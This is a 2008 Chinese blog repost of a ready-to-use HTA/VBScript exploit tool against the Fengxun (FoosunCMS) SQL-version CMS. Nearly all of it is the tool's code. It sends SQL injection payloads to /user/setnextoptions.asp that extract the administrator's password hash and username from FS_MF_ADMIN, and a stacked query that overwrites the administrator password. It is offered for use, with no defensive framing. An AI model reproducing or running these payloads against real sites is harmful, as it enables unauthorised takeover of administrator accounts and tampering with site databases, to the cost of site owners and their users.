首页 > 工具收集 > 风讯注入exp(hta版)

风讯注入exp(hta版)

2008年7月4日 发表评论 阅读评论

from:vbs小铺

<br /><SCRIPT LANGUAGE="VBScript"><br />Sub Window_onLoad<br />    window.resizeTo 450,380<br />    window.moveTo 300, 300<br />End Sub <br /></SCRIPT><br /><br /><SCRIPT LANGUAGE="VBScript"><br />Function getHTTPPage(Path)<br />       t = GetBody(Path)<br />       getHTTPPage = BytesToBstr(t, "GB2312")<br />      document.getElementById("url").innerText=getHTTPPage<br />End Function<br /></script><br /><SCRIPT LANGUAGE="VBScript"><br />Function GetBody(url)<br />      On Error Resume Next<br />      Set Retrieval = CreateObject("Microsoft.XMLHTTP")<br />      With Retrieval<br />          .Open "Get", url, False, "", ""<br />          .Send<br />           GetBody = .ResponseBody<br />      End With<br />      Set Retrieval = Nothing<br />End Function<br /><br />Function BytesToBstr(Body, Cset)<br />      Dim objstream<br />      Set objstream = CreateObject("adodb.stream")<br />       objstream.Type = 1<br />       objstream.Mode = 3<br />       objstream.Open<br />       objstream.Write Body<br />       objstream.Position = 0<br />       objstream.Type = 2<br />       objstream.Charset = Cset<br />       BytesToBstr = objstream.ReadText<br />       objstream.Close<br />      Set objstream = Nothing<br />End Function<br /><br /></script><br /><br /><title>by lcx</title><br /><input id="urlcode" NAME="urlcode" size="60" value="http://风讯url/user/setnextoptions.asp"><br /><select id="sql" name="sql" onchange=vbs:getHTTPPage(document.getElementById("urlcode").value+document.getElementById("sql").value)><br /><option value="">风讯sql版注入,至于其它备份shell的语句懒得写了</option><br /><option value="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员密码</option><br /><option value="?EquValue=1&ReqSql=select%201,Admin_Name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员用户名</option><br /><option value="?EquValue=1&ReqSql=select user;update FS_MF_ADMIN set ADMIN_pass_word=&#039;a0b923820dcc509a&#039; where id=1--">更改管理员密码为1</option><br /></select><br /><TEXTAREA id="url" NAME="url" ROWS="8" COLS="60"></TEXTAREA><br />

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:风讯注入exp(hta版)
本文地址:http://www.woyigui.cn/2008/07/04/fengxun-Injection-exp-hta/

分类: 工具收集 标签: , ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*